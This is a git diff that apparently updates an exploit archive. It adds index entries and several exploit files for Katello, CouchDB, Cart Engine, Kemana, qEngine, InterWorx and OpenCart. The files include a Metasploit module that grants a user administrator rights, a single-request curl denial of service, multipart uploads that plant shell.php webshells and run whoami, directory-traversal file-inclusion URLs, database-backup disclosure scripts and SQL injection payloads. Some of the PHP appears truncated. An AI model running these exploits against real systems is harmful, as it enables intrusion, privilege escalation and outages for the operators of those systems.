diff --git a/files.csv b/files.csv index 96a88afdf..bd42a00c6 100755 --- a/files.csv +++ b/files.csv @@ -21086,7 +21086,7 @@ id,file,description,date,author,platform,type,port 23898,platforms/asp/webapps/23898.txt,"Cactusoft CactuShop 5.0/5.1 - SQL Injection Vulnerability",2004-03-31,"Nick Gudov",asp,webapps,0 23899,platforms/asp/webapps/23899.txt,"CactuSoft CactuShop 5.0/5.1 Cross-Site Scripting Vulnerability",2004-03-31,"Nick Gudov",asp,webapps,0 23900,platforms/hardware/dos/23900.txt,"CDP 0.33/0.4 Console CD Player PrintTOC Function Buffer Overflow Vulnerability",2004-03-31,"Shaun Colley",hardware,dos,0 -23901,platforms/php/webapps/23901.txt,"pfSense 2.0.1 XSS / CSRF / Remote Command Execution",2013-01-05,"Yann CAM",php,webapps,0 +23901,platforms/php/webapps/23901.txt,"pfSense 2.0.1 - XSS / CSRF / Remote Command Execution",2013-01-05,"Yann CAM",php,webapps,0 23902,platforms/multiple/dos/23902.txt,"Roger Wilco Server 1.4.1 UDP Datagram Handling Denial of Service Vulnerability",2004-03-31,"Luigi Auriemma",multiple,dos,0 23903,platforms/windows/remote/23903.html,"Microsoft Internet Explorer 6.0 HTML Form Status Bar Misrepresentation Vulnerability",2004-03-31,http-equiv,windows,remote,0 23904,platforms/multiple/dos/23904.txt,"Roger Wilco Server 1.4.1 Unauthorized Audio Stream Denial of Service Vulnerability",2004-03-31,"Luigi Auriemma",multiple,dos,0 @@ -29263,3 +29263,31 @@ id,file,description,date,author,platform,type,port 32498,platforms/asp/webapps/32498.txt,"Dizi Portali 'diziler.asp' SQL Injection Vulnerability",2008-10-21,"CyberGrup Lojistik",asp,webapps,0 32499,platforms/php/webapps/32499.txt,"phPhotoGallery 0.92 'index.php' SQL Injection Vulnerability",2008-10-21,KnocKout,php,webapps,0 32500,platforms/asp/webapps/32500.txt,"Bahar Download Script 2.0 'aspkat.asp' SQL Injection Vulnerability",2008-10-21,"CyberGrup Lojistik",asp,webapps,0 +32501,platforms/multiple/local/32501.txt,"NXP Semiconductors MIFARE Classic Smartcard - Multiple Security Weaknesses",2008-10-21,"Flavio D. Garcia",multiple,local,0 +32502,platforms/php/webapps/32502.txt,"GetSimple CMS 3.3.1 - Persistent Cross Site Scripting",2014-03-25,"Jeroen - IT Nerdbox",php,webapps,0 +32503,platforms/php/webapps/32503.txt,"Cart Engine 3.0.0 Remote Code Execution",2014-03-25,LiquidWorm,php,webapps,0 +32504,platforms/php/webapps/32504.txt,"Cart Engine 3.0.0 (task.php) Local File Inclusion Vulnerability",2014-03-25,LiquidWorm,php,webapps,0 +32505,platforms/php/webapps/32505.txt,"Cart Engine 3.0.0 Database Backup Disclosure Exploit",2014-03-25,LiquidWorm,php,webapps,0 +32506,platforms/php/webapps/32506.txt,"Kemana Directory 1.5.6 - kemana_admin_passwd Cookie User Password Hash Disclosure",2014-03-25,LiquidWorm,php,webapps,0 +32507,platforms/php/webapps/32507.txt,"Kemana Directory 1.5.6 Remote Code Execution",2014-03-25,LiquidWorm,php,webapps,0 +32508,platforms/php/webapps/32508.txt,"Kemana Directory 1.5.6 (run param) Local File Inclusion Vulnerability",2014-03-25,LiquidWorm,php,webapps,0 +32509,platforms/php/webapps/32509.txt,"Kemana Directory 1.5.6 Database Backup Disclosure Exploit",2014-03-25,LiquidWorm,php,webapps,0 +32510,platforms/php/webapps/32510.txt,"Kemana Directory 1.5.6 (qvc_init()) Cookie Poisoning CAPTCHA Bypass Exploit",2014-03-25,LiquidWorm,php,webapps,0 +32511,platforms/php/webapps/32511.txt,"qEngine CMS 6.0.0 - Multiple Vulnerabilities",2014-03-25,LiquidWorm,php,webapps,80 +32512,platforms/unix/remote/32512.rb,"FreePBX config.php Remote Code Execution",2014-03-25,metasploit,unix,remote,0 +32513,platforms/windows/dos/32513.py,"Haihaisoft HUPlayer 1.0.4.8 (.m3u, .pls, .asx) - Buffer Overflow (SEH)",2014-03-25,"Gabor Seljan",windows,dos,0 +32514,platforms/windows/dos/32514.py,"Haihaisoft Universal Player 1.5.8 (.m3u, .pls, .asx) - Buffer Overflow (SEH)",2014-03-25,"Gabor Seljan",windows,dos,0 +32515,platforms/linux/remote/32515.rb,"Katello (Red Hat Satellite) users/update_roles Missing Authorization",2014-03-26,metasploit,linux,remote,443 +32516,platforms/php/webapps/32516.txt,"InterWorx Control Panel 5.0.13 build 574 (xhr.php, i param) - SQL Injection",2014-03-26,"Eric Flokstra",php,webapps,80 +32517,platforms/windows/remote/32517.html,"Mozilla Firefox 3 ftp:// URL Multiple File Format Handling XSS",2008-10-21,"Muris Kurgas",windows,remote,0 +32518,platforms/windows/remote/32518.txt,"Google Chrome 0.2.149 ftp:// URL Multiple File Format Handling XSS",2008-10-21,"Muris Kurgas",windows,remote,0 +32519,platforms/multiple/dos/32519.txt,"Couchdb 1.5.0 - uuids DoS Exploit",2014-03-26,"Krusty Hack",multiple,dos,0 +32520,platforms/php/webapps/32520.txt,"OpenCart <= 1.5.6.1 - (openbay) Multiple SQL Injection",2014-03-26,"Saadi Siddiqui",php,webapps,0 +32521,platforms/php/webapps/32521.txt,"Osprey 1.0a4.1 'ListRecords.php' Multiple Remote File Include Vulnerabilities",2008-10-23,BoZKuRTSeRDaR,php,webapps,0 +32522,platforms/windows/dos/32522.py,"VirusChaser 8.0 - Stack Buffer Overflow",2014-03-26,wh1ant,windows,dos,0 +32523,platforms/php/webapps/32523.txt,"UC Gateway Investment SiteEngine 5.0 'api.php' URI Redirection Vulnerability",2008-10-23,xuanmumu,php,webapps,0 +32524,platforms/php/webapps/32524.txt,"UC Gateway Investment SiteEngine 5.0 'announcements.php' SQL Injection Vulnerability",2008-10-23,xuanmumu,php,webapps,0 +32525,platforms/php/webapps/32525.txt,"Jetbox CMS 2.1 'liste' Parameter Cross Site Scripting Vulnerability",2008-10-23,"Omer Singer",php,webapps,0 +32526,platforms/php/webapps/32526.txt,"ClipShare Pro 4.0 'fullscreen.php' Cross Site Scripting Vulnerability",2008-10-23,ShockShadow,php,webapps,0 +32527,platforms/php/webapps/32527.txt,"Adam Wright HTMLTidy 0.5 'html-tidy-logic.php' Cross Site Scripting Vulnerability",2008-10-23,ShockShadow,php,webapps,0 +32528,platforms/php/webapps/32528.txt,"iPeGuestbook 1.7/2.0 'pg' Parameter Cross-Site Scripting Vulnerability",2008-10-24,"Ghost Hacker",php,webapps,0 diff --git a/platforms/linux/remote/32515.rb b/platforms/linux/remote/32515.rb new file mode 100755 index 000000000..4c5c2fb3a --- /dev/null +++ b/platforms/linux/remote/32515.rb @@ -0,0 +1,147 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit4 < Msf::Auxiliary + + include Msf::Exploit::Remote::HttpClient + + def initialize + super( + 'Name' => 'Katello (Red Hat Satellite) users/update_roles Missing Authorization', + 'Description' => %q{ + This module exploits a missing authorization vulnerability in the + "update_roles" action of "users" controller of Katello and Red Hat Satellite + (Katello 1.5.0-14 and earlier) by changing the specified account to an + administrator account. + }, + 'Author' => 'Ramon de C Valle', + 'License' => MSF_LICENSE, + 'References' => + [ + ['CVE', '2013-2143'], + ['CWE', '862'] + ], + 'DisclosureDate' => 'Mar 24 2014' + ) + + register_options( + [ + Opt::RPORT(443), + OptBool.new('SSL', [true, 'Use SSL', true]), + OptString.new('USERNAME', [true, 'Your username']), + OptString.new('PASSWORD', [true, 'Your password']), + OptString.new('TARGETURI', [ true, 'The path to the application', '/']), + ], self.class + ) + end + + def run + print_status("Logging into #{target_url}...") + res = send_request_cgi( + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, 'user_session', 'new'), + 'vars_get' => { + 'username' => datastore['USERNAME'], + 'password' => datastore['PASSWORD'] + } + ) + + if res.nil? + print_error('No response from remote host') + return + end + + if res.headers['Location'] =~ /user_session\/new$/ + print_error('Authentication failed') + return + else + session = $1 if res.get_cookies =~ /_katello_session=(\S*);/ + + if session.nil? + print_error('Failed to retrieve the current session') + return + end + end + + print_status('Retrieving the CSRF token for this session...') + res = send_request_cgi( + 'cookie' => "_katello_session=#{session}", + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, 'dashboard') + ) + + if res.nil? + print_error('No response from remote host') + return + end + + if res.headers['Location'] =~ /user_session\/new$/ + print_error('Authentication failed') + return + else + session = $1 if res.get_cookies =~ /_katello_session=(\S*);/ + + if session.nil? + print_error('Failed to retrieve the current session') + return + end + end + + if res.headers['Location'] =~ /user_session\/new$/ + print_error('Failed to retrieve the user id') + return + else + csrf_token = $1 if res.body =~ //i + csrf_token = $1 if res.body =~ //i if csrf_token.nil? + + if csrf_token.nil? + print_error('Failed to retrieve the CSRF token') + return + end + + user = $1 if res.body =~ /\/users.(\d+)#list_search=#{datastore['USERNAME']}/ + + if user.nil? + print_error('Failed to retrieve the user id') + return + end + end + + print_status("Sending update-user request to #{target_url('users', user, 'update_roles')}...") + res = send_request_cgi( + 'cookie' => "_katello_session=#{session}", + 'headers' => { + 'X-CSRF-Token' => csrf_token + }, + 'method' => 'PUT', + 'uri' => normalize_uri(target_uri.path, 'users', user, 'update_roles'), + 'vars_post' => { + 'user[role_ids][]' => '1' + } + ) + + if res.nil? + print_error('No response from remote host') + return + end + + if res.headers['X-Message-Type'] =~ /success$/ + print_good('User updated successfully') + else + print_error('Failed to update user') + end + end + + def target_url(*args) + (ssl ? 'https' : 'http') + + if rport.to_i == 80 || rport.to_i == 443 + "://#{vhost}" + else + "://#{vhost}:#{rport}" + end + normalize_uri(target_uri.path, *args) + end +end \ No newline at end of file diff --git a/platforms/multiple/dos/32519.txt b/platforms/multiple/dos/32519.txt new file mode 100755 index 000000000..abe34f8ce --- /dev/null +++ b/platforms/multiple/dos/32519.txt @@ -0,0 +1,16 @@ +# Exploit Title: Couchdb uuids DOS exploit +# Google Dork inurl: _uuids +# Date: 03/24/2014 +# Exploit Author: KrustyHack +# Vendor Homepage: http://couchdb.apache.org/ +# Software Link: http://couchdb.apache.org/ +# Version: up to 1.5.0 +# Tested on: Linux Couchdb up to 1.5.0 + +HOW TO +====== +curl http://couchdb_target/_uuids?count=99999999999999999999999999999999999999999999999999999999999999999999999 + +TEST +==== +Tested on a 16G RAM Quadcore server. Couchdb dead on 30 seconds with only one GET request. \ No newline at end of file diff --git a/platforms/multiple/local/32501.txt b/platforms/multiple/local/32501.txt new file mode 100755 index 000000000..7b4cdb98d --- /dev/null +++ b/platforms/multiple/local/32501.txt @@ -0,0 +1,15 @@ +source: http://www.securityfocus.com/bid/31853/info + +MIFARE Classic is prone to multiple security weaknesses: + +1. A security weakness may allow attackers to recover the internal state of the linear feedback shift register. + +2. A security weakness may allow attackers to recover the previous state of the linear feedback shift register. + +3. A security weakness may allow attackers to invert the filter function and potentially gain access to the private key. + +4. A security weakness may allow attackers to reduce the search space for tag nonces. + +Exploiting these issues in combination may allow attackers to gain access to the smartcard's secret key. Successful exploits will allow attackers with physical access to an RFID reader to bypass certain physical security restrictions. + +http://www.exploit-db.com/sploits/32501.tgz \ No newline at end of file diff --git a/platforms/php/webapps/32502.txt b/platforms/php/webapps/32502.txt new file mode 100755 index 000000000..84a2f6506 --- /dev/null +++ b/platforms/php/webapps/32502.txt @@ -0,0 +1,56 @@ +# Exploit Title: etSimple CMS v3.3.1 Persistent Cross Site Scripting + +# Google Dork: N/A + +# Date: 24-03-2014 + +# Exploit Author: Jeroen - IT Nerdbox + +# Vendor Homepage: http://get-simple.info/ + +# Software Link: http://get-simple.info/download/ + +# Version: v3.3.1 + +# Tested on: N/A + +# CVE : N/A + +# + +## Description: + +# + +# In the administrative interface, the users can change their personal +settings. The parameters "name" and + +# "permalink" do not properly sanitize its input and allows malicious code +to be stored in the XML file. + +# + +## PoC: + +# Admin"> + +# http://url/admin/settings.php + +# + +# + +# The following parameters are vulnerable: + +# + +# 1. Permalink + +# 2. Name + +# + +# + +# More information can be found at: +http://www.nerdbox.it/getsimple-cms-v3-3-1-vulnerabilities/ \ No newline at end of file diff --git a/platforms/php/webapps/32503.txt b/platforms/php/webapps/32503.txt new file mode 100755 index 000000000..da5282064 --- /dev/null +++ b/platforms/php/webapps/32503.txt @@ -0,0 +1,350 @@ +? +Cart Engine 3.0.0 Remote Code Execution + + +Vendor: C97net +Product web page: http://www.c97.net +Affected version: 3.0.0 + +Summary: Open your own online shop today with Cart Engine! The +small, yet powerful and don't forget, FREE shopping cart based +on PHP & MySQL. Unique features of Cart Engine include: CMS engine +based on our qEngine, product options, custom fields, digital +products, search engine friendly URL, user friendly administration +control panel, easy to use custom fields, module expandable, sub +products, unsurpassed flexibility...and more! + +Desc: Cart Engine suffers from an authenticated arbitrary code +execution. The vulnerability is caused due to the improper verification +of uploaded files in several modules thru several POST parameters. +This can be exploited to execute arbitrary PHP code by uploading +a malicious PHP script file that will be stored in '/public/image' +directory. Minimum permissions needed for a user to upload any file: + +User level: Regular (param: user_level=1) +Admin level: Editor (param: admin_level=3) + +Only the 'Super Admin' level makes the Tool 'File Manager' available. + + +Tested on: Apache/2.4.7 (Win32) + PHP/5.5.6 + MySQL 5.6.14 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2014-5182 +Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5182.php + + +Dork #1: intitle:powered by c97.net +Dork #2: intitle:powered by qEngine +Dork #3: intitle:powered by Kemana.c97.net +Dork #4: intitle:powered by Cart2.c97.net + + + +07.03.2014 + +--- + + + #1 (Modules > qBanner > Manage Banner > Add Entry) + +POST http://localhost/ce3_0/admin/task.php?mod=qbanner&run=edit.php& HTTP/1.1 + + +-----------------------------225222869427624 +Content-Disposition: form-data; name="AXSRF_token" + +52e9c9ff9bb251a144b82a662496f5b8 +-----------------------------225222869427624 +Content-Disposition: form-data; name="qadmin_cmd" + +new +-----------------------------225222869427624 +Content-Disposition: form-data; name="qadmin_process" + +1 +-----------------------------225222869427624 +Content-Disposition: form-data; name="qadmin_savenew" + +0 +-----------------------------225222869427624 +Content-Disposition: form-data; name="primary_key" + +page_id +-----------------------------225222869427624 +Content-Disposition: form-data; name="primary_val" + +dummy +-----------------------------225222869427624 +Content-Disposition: form-data; name="page_image"; filename="shell.php" +Content-Type: application/octet-stream + + +-----------------------------225222869427624 +Content-Disposition: form-data; name="page_title" + +ZSL +-----------------------------225222869427624 +Content-Disposition: form-data; name="page_keyword" + +http://www.zeroscience.mk +-----------------------------225222869427624 +Content-Disposition: form-data; name="group_id" + +QBANR +-----------------------------225222869427624 +Content-Disposition: form-data; name="page_body" + +This page is part of qBanner module. Please use qBanner Manager to edit this page. +-----------------------------225222869427624 +Content-Disposition: form-data; name="page_allow_comment" + +-----------------------------225222869427624 +Content-Disposition: form-data; name="page_list" + +-----------------------------225222869427624-- + + +Upload location: http://localhost/ce3_0/public/image/ +Exec: http://localhost/ce3_0/public/image/shell.php?cmd=whoami + + + + + #2 (Tools > File Manager > Upload) + +POST http://localhost/ce3_0/admin/fman/upload_process.php HTTP/1.1 + + +-----------------------------76802486520945 +Content-Disposition: form-data; name="chdir" + +-----------------------------76802486520945 +Content-Disposition: form-data; name="n" + +5 +-----------------------------76802486520945 +Content-Disposition: form-data; name="userfile_1"; filename="shell.php" +Content-Type: application/octet-stream + + +-----------------------------76802486520945 +Content-Disposition: form-data; name="userfile_2"; filename="" +Content-Type: application/octet-stream + +-----------------------------76802486520945 +Content-Disposition: form-data; name="userfile_3"; filename="" +Content-Type: application/octet-stream + +-----------------------------76802486520945 +Content-Disposition: form-data; name="userfile_4"; filename="" +Content-Type: application/octet-stream + +-----------------------------76802486520945 +Content-Disposition: form-data; name="userfile_5"; filename="" +Content-Type: application/octet-stream + +-----------------------------76802486520945-- + + +Upload location: Anywhere within the webroot folder and its subfolders. +Exec: http://localhost/ce3_0/shell.php?cmd=whoami + + + + + #3 (Modules > Slideshow > Manage Slides > Add Entry) + +POST http://localhost/ce3_0/admin/task.php?mod=slideshow&run=edit.php& HTTP/1.1 + + +-----------------------------23201806221528 +Content-Disposition: form-data; name="AXSRF_token" + +52e9c9ff9bb251a144b82a662496f5b8 +-----------------------------23201806221528 +Content-Disposition: form-data; name="qadmin_cmd" + +new +-----------------------------23201806221528 +Content-Disposition: form-data; name="qadmin_process" + +1 +-----------------------------23201806221528 +Content-Disposition: form-data; name="qadmin_savenew" + +0 +-----------------------------23201806221528 +Content-Disposition: form-data; name="primary_key" + +page_id +-----------------------------23201806221528 +Content-Disposition: form-data; name="primary_val" + +dummy +-----------------------------23201806221528 +Content-Disposition: form-data; name="page_image"; filename="shell.php" +Content-Type: application/octet-stream + + +-----------------------------23201806221528 +Content-Disposition: form-data; name="page_title" + +ZSL +-----------------------------23201806221528 +Content-Disposition: form-data; name="page_keyword" + +http://www.zeroscience.mk +-----------------------------23201806221528 +Content-Disposition: form-data; name="group_id" + +SSHOW +-----------------------------23201806221528 +Content-Disposition: form-data; name="page_body" + +This page is part of SlideShow module. Please use SlideShow Manager to edit this page. +-----------------------------23201806221528 +Content-Disposition: form-data; name="page_allow_comment" + +-----------------------------23201806221528 +Content-Disposition: form-data; name="page_list" + +-----------------------------23201806221528-- + + +Upload location: http://localhost/ce3_0/public/image/ +Exec: http://localhost/ce3_0/public/image/shell.php?cmd=whoami + + + + + #4 (Contents > Manage Categories > Add Entry) + +POST http://localhost/ce3_0/admin/page_cat.php? HTTP/1.1 + + +-----------------------------205172563220150 +Content-Disposition: form-data; name="AXSRF_token" + +3afa0c7483889ac54d7b6afa4083a9a2 +-----------------------------205172563220150 +Content-Disposition: form-data; name="qadmin_cmd" + +new +-----------------------------205172563220150 +Content-Disposition: form-data; name="qadmin_process" + +1 +-----------------------------205172563220150 +Content-Disposition: form-data; name="qadmin_savenew" + +0 +-----------------------------205172563220150 +Content-Disposition: form-data; name="primary_key" + +idx +-----------------------------205172563220150 +Content-Disposition: form-data; name="primary_val" + +dummy +-----------------------------205172563220150 +Content-Disposition: form-data; name="group_id" + +GENPG +-----------------------------205172563220150 +Content-Disposition: form-data; name="parent_id" + +1 +-----------------------------205172563220150 +Content-Disposition: form-data; name="cat_name" + +ZSL +-----------------------------205172563220150 +Content-Disposition: form-data; name="permalink" + +-----------------------------205172563220150 +Content-Disposition: form-data; name="cat_details" + +
Zero Science Lab
+-----------------------------205172563220150 +Content-Disposition: form-data; name="cat_image"; filename="shell.php" +Content-Type: application/octet-stream + + +-----------------------------205172563220150-- + + +Upload location: http://localhost/ce3_0/public/image/ +Exec: http://localhost/ce3_0/public/image/shell.php?cmd=whoami + + + + + #5 (Products > Category > Add Entry) + +POST http://localhost/ce3_0/admin/product_cat.php? HTTP/1.1 + + +-----------------------------137423069119287 +Content-Disposition: form-data; name="AXSRF_token" + +c3d8ccc82a75bb49d7698b6ed27fd016 +-----------------------------137423069119287 +Content-Disposition: form-data; name="qadmin_cmd" + +new +-----------------------------137423069119287 +Content-Disposition: form-data; name="qadmin_process" + +1 +-----------------------------137423069119287 +Content-Disposition: form-data; name="qadmin_savenew" + +0 +-----------------------------137423069119287 +Content-Disposition: form-data; name="primary_key" + +idx +-----------------------------137423069119287 +Content-Disposition: form-data; name="primary_val" + +dummy +-----------------------------137423069119287 +Content-Disposition: form-data; name="parent_id" + +1 +-----------------------------137423069119287 +Content-Disposition: form-data; name="cat_name" + +ZSL +-----------------------------137423069119287 +Content-Disposition: form-data; name="permalink" + +zsl +-----------------------------137423069119287 +Content-Disposition: form-data; name="cat_details" + +CategoryDesc
+-----------------------------137423069119287 +Content-Disposition: form-data; name="cat_image"; filename="shell.php" +Content-Type: application/octet-stream + + +-----------------------------137423069119287 +Content-Disposition: form-data; name="cat_keywords" + +Zero Science Lab +-----------------------------137423069119287 +Content-Disposition: form-data; name="cat_featured" + +-----------------------------137423069119287-- + + +Upload location: http://localhost/ce3_0/public/image/ +Exec: http://localhost/ce3_0/public/image/shell.php?cmd=whoami diff --git a/platforms/php/webapps/32504.txt b/platforms/php/webapps/32504.txt new file mode 100755 index 000000000..409a24f77 --- /dev/null +++ b/platforms/php/webapps/32504.txt @@ -0,0 +1,49 @@ +? +Cart Engine 3.0.0 (task.php) Local File Inclusion Vulnerability + + +Vendor: C97net +Product web page: http://www.c97.net +Affected version: 3.0.0 + +Summary: Open your own online shop today with Cart Engine! The +small, yet powerful and don't forget, FREE shopping cart based +on PHP & MySQL. Unique features of Cart Engine include: CMS engine +based on our qEngine, product options, custom fields, digital +products, search engine friendly URL, user friendly administration +control panel, easy to use custom fields, module expandable, sub +products, unsurpassed flexibility...and more! + +Desc: Cart Engine suffers from an authenticated file inclusion +vulnerability (LFI) when input passed thru the 'run' parameter to +task.php is not properly verified before being used to include files. +This can be exploited to include files from local resources with +directory traversal attacks. + + +Tested on: Apache/2.4.7 (Win32) + PHP/5.5.6 + MySQL 5.6.14 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2014-5181 +Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5181.php + + +Dork #1: intitle:powered by c97.net +Dork #2: intitle:powered by qEngine +Dork #3: intitle:powered by Kemana.c97.net +Dork #4: intitle:powered by Cart2.c97.net + + + +07.03.2014 + +--- + + +http://localhost/ce3_0/admin/task.php?run=../../../../../../windows/win.ini diff --git a/platforms/php/webapps/32505.txt b/platforms/php/webapps/32505.txt new file mode 100755 index 000000000..06bd4b5bc --- /dev/null +++ b/platforms/php/webapps/32505.txt @@ -0,0 +1,179 @@ +? $total) return; + if(empty($start_time)) $start_time=time(); + + $now = time(); + $perc=(double)($done/$total); + $bar=floor($perc*$size); + + $disp=number_format($perc*100, 0); + + $status_bar="\r $disp% ["; + $status_bar.=str_repeat("=", $bar); + if($bar<$size) + { + $status_bar.=">"; + $status_bar.=str_repeat(" ", $size-$bar); + } else + { + $status_bar.="="; + } + + $status_bar.="] $done/$total"; + + $rate = ($now-$start_time)/$done; + $left = $total - $done; + $eta = round($rate * $left, 2); + $elapsed = $now - $start_time; + + $status_bar.= " remaining: ".number_format($eta)." sec. elapsed: ".number_format($elapsed)." sec."; + + echo "$status_bar "; + flush(); + + if($done == $total) + { + echo "\n"; + } +} + +print " + @---------------------------------------------------------------@ + | | + | Cart Engine 3.0.0 Database Backup Disclosure Exploit | + | | + | | + | Copyleft (c) 2014, Zero Science Lab | + | | + | Advisory ID: ZSL-2014-5180 | + | www.zeroscience.mk | + | | + @---------------------------------------------------------------@ + "; + +if ($argc < 4) +{ + print "\n\n [+] Usage: php $argv[0]TEST
+-----------------------------9813040432632-- + + +Upload location: http://localhost/kemana/public/image/ +Exec: http://localhost/kemana/public/image/shell.php?cmd=whoami diff --git a/platforms/php/webapps/32508.txt b/platforms/php/webapps/32508.txt new file mode 100755 index 000000000..471416009 --- /dev/null +++ b/platforms/php/webapps/32508.txt @@ -0,0 +1,47 @@ +? +Kemana Directory 1.5.6 (run param) Local File Inclusion Vulnerability + + +Vendor: C97net +Product web page: http://www.c97.net +Affected version: 1.5.6 + +Summary: Experience the ultimate directory script solution +with Kemana. Create your own Yahoo or Dmoz easily with Kemana. +Unique Kemana's features including: CMS engine based on our +qEngine, multiple directories support, user friendly administration +control panel, easy to use custom fields, unsurpassed flexibility. + +Desc: Kemana suffers from an authenticated file inclusion vulnerability +(LFI) when input passed thru the 'run' parameter to task.php is +not properly verified before being used to include files. This can +be exploited to include files from local resources with directory +traversal attacks. + + +Tested on: Apache/2.4.7 (Win32) + PHP/5.5.6 + MySQL 5.6.14 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2014-5177 +Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5177.php + + +Dork #1: intitle:powered by c97.net +Dork #2: intitle:powered by qEngine +Dork #3: intitle:powered by Kemana.c97.net +Dork #4: intitle:powered by Cart2.c97.net + + + +07.03.2014 + +--- + + +http://localhost/kemana/admin/task.php?run=../../../../../../windows/win.ini diff --git a/platforms/php/webapps/32509.txt b/platforms/php/webapps/32509.txt new file mode 100755 index 000000000..134a74ad8 --- /dev/null +++ b/platforms/php/webapps/32509.txt @@ -0,0 +1,177 @@ + $total) return; + if(empty($start_time)) $start_time=time(); + + $now = time(); + $perc=(double)($done/$total); + $bar=floor($perc*$size); + + $disp=number_format($perc*100, 0); + + $status_bar="\r $disp% ["; + $status_bar.=str_repeat("=", $bar); + if($bar<$size) + { + $status_bar.=">"; + $status_bar.=str_repeat(" ", $size-$bar); + } else + { + $status_bar.="="; + } + + $status_bar.="] $done/$total"; + + $rate = ($now-$start_time)/$done; + $left = $total - $done; + $eta = round($rate * $left, 2); + $elapsed = $now - $start_time; + + $status_bar.= " remaining: ".number_format($eta)." sec. elapsed: ".number_format($elapsed)." sec."; + + echo "$status_bar "; + flush(); + + if($done == $total) + { + echo "\n"; + } +} + +print " + @---------------------------------------------------------------@ + | | + | Kemana Directory 1.5.6 Database Backup Disclosure Exploit | + | | + | | + | Copyleft (c) 2014, Zero Science Lab | + | | + | Advisory ID: ZSL-2014-5176 | + | www.zeroscience.mk | + | | + @---------------------------------------------------------------@ + "; + +if ($argc < 4) +{ + print "\n\n [+] Usage: php $argv[0]Zero Science Lab
+-----------------------------205172563220150 +Content-Disposition: form-data; name="cat_image"; filename="shell.php" +Content-Type: application/octet-stream + + +-----------------------------205172563220150-- + + +Upload location: http://localhost/qe6/public/image/ +Exec: http://localhost/qe6/public/image/shell.php?cmd=whoami + + diff --git a/platforms/php/webapps/32516.txt b/platforms/php/webapps/32516.txt new file mode 100755 index 000000000..a9483865b --- /dev/null +++ b/platforms/php/webapps/32516.txt @@ -0,0 +1,72 @@ +================================================= +Title: SQL injection in InterWorx Control Panel +Product: InterWorx Web Control Panel +Vendor: InterWorx LLC +Tested Version: 5.0.13 build 574 +Vulnerability Type: SQL Injection [CWE-89] +CVE Reference: CVE-2014-2531 +Solution Status: Fixed in Version 5.0.14 build 577 +Discovered and Provided: Eric Flokstra +================================================= + +About the Vendor: +------------------------- +The InterWorx Hosting Control Panel is a web hosting and linux server +management system that provides tools for server administrators to +command their servers and for end users to oversee the operations of +their website. + +Advisory Details: +----------------------- +SQL injection vulnerability in the InterWorx Web Control Panel. + +The InterWorx application stores its data in a MySQL-database. For +interaction with the database dynamic queries are used. These queries +are created by concatenating strings from the application with user +input. However, the application does not perform proper validation or +escaping of the supplied input in the 'i' parameter when sorting user +accounts in NodeWorx, Siteworx and Resellers. Malicious users with +access to this functionality can manipulate database queries to +achieve other goals than the developers had in mind. + +The following requests can be used as proof of concept and demonstrate +that user input is concatenated into a database query without proper +validation or escaping. The payload in the first request checks +whether the letter 'm' is the first letter of the database version. +Since the database in use is MySQL this condition is true and the +table is sorted by column 'nu.email'. If the condition is false +(request 2/letter t) the table is sorted by column 'nu.nickname'. + +Request 1: +--------------- +POST /xhr.php HTTP/1.1 +Host: some.host.com:1234 +".." + +i={"r":"Controller","i":{"pgn8state":{"l":20,"o":0,"or":"(CASE+WHEN+(substring(@@version,1,1)='m')+THEN+nu.email+ELSE+nu.nickname+END)","d":"asc"},"refresh_on":[["addCommit",null],["editCommit",null],["deleteCommit",null],["activateCommit",null],["deactivateCommit",null]],"iw_refresh_action":"listUsers","iw_refresh_ctrl":"Ctrl_Nodeworx_Users","security_token":"-eNSV4z4pdYomP3pg8LrVSwRtHYE","c":"index","a":"livePayloadCommit","iw_sess_hint":"nodeworx","iw_payload_output":"html","where_was_i":"/nodeworx/users"}} + +Request 2: +--------------- +POST /xhr.php HTTP/1.1 +Host: some.host.com:1234 +".." + +i={"r":"Controller","i":{"pgn8state":{"l":20,"o":0,"or":"(CASE+WHEN+(substring(@@version,1,1)='t')+THEN+nu.email+ELSE+nu.nickname+END)","d":"asc"},"refresh_on":[["addCommit",null],["editCommit",null],["deleteCommit",null],["activateCommit",null],["deactivateCommit",null]],"iw_refresh_action":"listUsers","iw_refresh_ctrl":"Ctrl_Nodeworx_Users","security_token":"-eNSV4z4pdYomP3pg8LrVSwRtHYE","c":"index","a":"livePayloadCommit","iw_sess_hint":"nodeworx","iw_payload_output":"html","where_was_i":"/nodeworx/users"}} + +Vendor contact timeline: +--------------------------------- +21 Feb 2014: Vendor notification +21 Feb 2014: Vulnerability confirmation +17 Mar 2014: Issue patched +25 Mar 2014: Public disclosure + +Solution: +------------ +Upgrade to the latest version (5.0.14 build 577) of InterWorx Web Control Panel. + +References: +----------------- +[1] InterWorx Beta Channel - +http://forums.interworx.com/threads/8000-InterWorx-Version-5-0-14-Released-on-Beta-Channel! +[2] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org +[3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org \ No newline at end of file diff --git a/platforms/php/webapps/32520.txt b/platforms/php/webapps/32520.txt new file mode 100755 index 000000000..5d4c89a21 --- /dev/null +++ b/platforms/php/webapps/32520.txt @@ -0,0 +1,50 @@ +# Exploit Title : OpenCart <= 1.5.6.1 SQL Injection +# Date : 2014/3/26 +# Exploit Author : Saadat Ullah ? saadi_linux@rocketmail.com +# Software Link : http://www.opencart.com/index.php?route=download/download + : https://github.com/opencart +# Software web : www.opencart.com +# Author HomePage : http://security-geeks.blogspot.com/ +# Tested on: Server : Apache/2.2.15 PHP/5.3.3 + +#Opencart suffers from multipe SQL injection in ebay.php the bug is more about +privilege escalation as attacker may need openbay module access . + +Poc +Poorly coded file full of SQLi opencart/system/library/ebay.php +In file opencart/system/library/ebay.php +product_id is used in a SQL query without being sanitize. + +public function getEbayItemId($product_id) { + $this->log('getEbayItemId() - Product ID: '.$product_id); + + $qry = $this->db->query("SELECT `ebay_item_id` FROM `" . 